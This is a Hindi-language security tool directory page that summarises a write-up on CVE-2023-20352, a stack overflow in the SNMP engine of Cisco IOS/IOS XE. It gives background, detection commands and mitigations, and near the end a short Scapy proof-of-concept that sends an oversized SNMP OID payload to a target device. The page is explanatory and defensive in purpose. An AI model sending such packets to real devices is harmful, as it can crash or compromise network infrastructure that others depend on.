Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 Cisco IOS/IOS XE के SNMP इंजन में एक गंभीर स्टैक ओवरफ़्लो दोष है। केवल तैयार किए गए SNMP पैकेट से, दूरस्थ हमलावर सिस्टम को क्रैश कर सकते हैं या रूट नियंत्रण प्राप्त कर सकते हैं। सभी SNMP संस्करण असुरक्षित हैं - अब पैच करें या पूर्ण समझौता होने का जोखिम उठाएं। | Kitploit
उपकरण/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
शोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

CVE-2023-20352 Cisco IOS/IOS XE के SNMP इंजन में एक गंभीर स्टैक ओवरफ़्लो दोष है। केवल तैयार किए गए SNMP पैकेट से, दूरस्थ हमलावर सिस्टम को क्रैश कर सकते हैं या रूट नियंत्रण प्राप्त कर सकते हैं। सभी SNMP संस्करण असुरक्षित हैं - अब पैच करें या पूर्ण समझौता होने का जोखिम उठाएं।

रिपॉजिटरी देखें
81 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SNMPocalypse-सिस्को-बग-हैकर्स-को-डिवाइस-क्रैश-या-कमांड-करने-देता-है

CVE-2023-20352 Cisco IOS/IOS XE के SNMP इंजन में एक गंभीर स्टैक ओवरफ्लो दोष है। केवल तैयार किए गए SNMP पैकेटों से, दूरस्थ हमलावर सिस्टम को क्रैश कर सकते हैं या रूट नियंत्रण हथिया सकते हैं। सभी SNMP संस्करण असुरक्षित हैं - अभी पैच लगाएं या पूर्ण समझौते का जोखिम उठाएं

मार्क मैलिया द्वारा

SNMP का परिचय

सिंपल नेटवर्क मैनेजमेंट प्रोटोकॉल (SNMP) नेटवर्क प्रशासन में एक मूलभूत प्रोटोकॉल है, जो सिस्टम प्रशासकों को नेटवर्क डिवाइसों की निगरानी, कॉन्फ़िगरेशन और प्रबंधन करने में सक्षम बनाता है। यह पोर्ट 161 (SNMP अनुरोधों के लिए) और 162 (ट्रैप के लिए) पर काम करता है। SNMP तीन संस्करणों का समर्थन करता है: v1, v2c, और v3, जिनमें से प्रत्येक सुरक्षा के विभिन्न स्तर प्रदान करता है। यह मेरे नज़दीकी विषय से जुड़ता है - मेरी थीसिस SNMP पर केंद्रित थी, और Cisco मेरे दैनिक कार्य में एक स्थायी हिस्सा बना हुआ है।

SNMP की उपयोगिता नेटवर्क पर रीयल-टाइम मॉनिटरिंग, इन्वेंट्री प्रबंधन और दोष का पता लगाने तक फैली हुई है। अपने महत्व के बावजूद, नेटवर्क प्रबंधन में SNMP की भूमिका सुरक्षा जोखिम भी पैदा करती है जब इसे ठीक से सुरक्षित नहीं किया जाता, जैसा कि CVE-2023-20352 भेद्यता में देखा गया है।

क्या गलत हुआ: CVE-2023-20352 की व्याख्या

CVE-2023-20352 एक उच्च-गंभीरता वाला स्टैक-आधारित बफर ओवरफ्लो दोष है जो Cisco IOS और IOS XE डिवाइसों को प्रभावित करता है। यह SNMP सबसिस्टम में स्थित है, जो नेटवर्क प्रबंधन ट्रैफ़िक को संसाधित करता है।

तकनीकी विवरण:

  • भेद्यता प्रकार: स्टैक-आधारित बफर ओवरफ्लो (CWE-121)
  • CVSS स्कोर: 7.7 (उच्च)
  • प्रभाव: संभावित सेवा अस्वीकृति (DoS) या दूरस्थ कोड निष्पादन (RCE)

भेद्यता एक असुरक्षित डिवाइस पर भेजे गए तैयार किए गए SNMP पैकेटों द्वारा ट्रिगर होती है, जिससे अनुचित सीमा जाँच और स्टैक ओवरफ्लो होता है। सभी SNMP संस्करण प्रभावित हैं।

शोषण परिदृश्य

  1. निम्न विशेषाधिकार हमला:

    • आवश्यक पहुँच: SNMPv2c रीड-ओनली स्ट्रिंग या SNMPv3 क्रेडेंशियल्स।
    • प्रभाव: डिवाइस रीलोड (DoS)।
  2. उच्च विशेषाधिकार हमला:

    • आवश्यक पहुँच: विशेषाधिकार 15 क्रेडेंशियल के साथ SNMPv1/v2c स्ट्रिंग।
    • प्रभाव: रूट के रूप में पूर्ण RCE।

पता लगाना और सत्यापन

भेद्यताओं का पता लगाने के लिए, प्रशासक निम्नलिखित CLI कमांड का उपयोग कर सकते हैं:

show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp

इसे लॉक करें: शमन के कदम

  • पैच आवेदन: Cisco ने प्रभावित प्लेटफार्मों के लिए फर्मवेयर पैच जारी किए हैं।
  • SNMP एक्सेस प्रतिबंधित करें: यदि पहले से नहीं किया है तो विश्वसनीय IP तक पहुँच सीमित करें।
  • असुरक्षित OID अक्षम करें: snmp-server view <view-name> <OID> excluded जैसे कमांड का उपयोग करें।

हमलावर इसका शोषण कैसे कर सकते हैं

Python और Scapy का उपयोग करते हुए एक अवधारणात्मक PoC शोषण क्षमता प्रदर्शित करता है:

from scapy.all import *

# लक्ष्य IP और SNMP समुदाय स्ट्रिंग से बदलें
target_ip = "192.168.1.1"
community = "public"

# दुर्भावनापूर्ण पैकेट तैयार करें
payload = b"A" * 1024  # ओवरफ्लो बफर
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))

send(packet)

नोट: यह एक सरलीकृत उदाहरण है। वास्तविक शोषण के लिए सटीक पेलोड निर्माण और विशेषाधिकार वृद्धि की आवश्यकता होती है।

निष्कर्ष

CVE-2023-20352 भेद्यता SNMP की महत्वपूर्ण भूमिका और संबंधित जोखिमों को रेखांकित करती है। संगठनों को खतरों को कम करने के लिए पैच लगाने और SNMP कॉन्फ़िगरेशन को सुरक्षित करने को प्राथमिकता देनी चाहिए, ताकि उभरते हमलों के खिलाफ नेटवर्क लचीलापन सुनिश्चित हो सके।

टूल डाउनलोड करें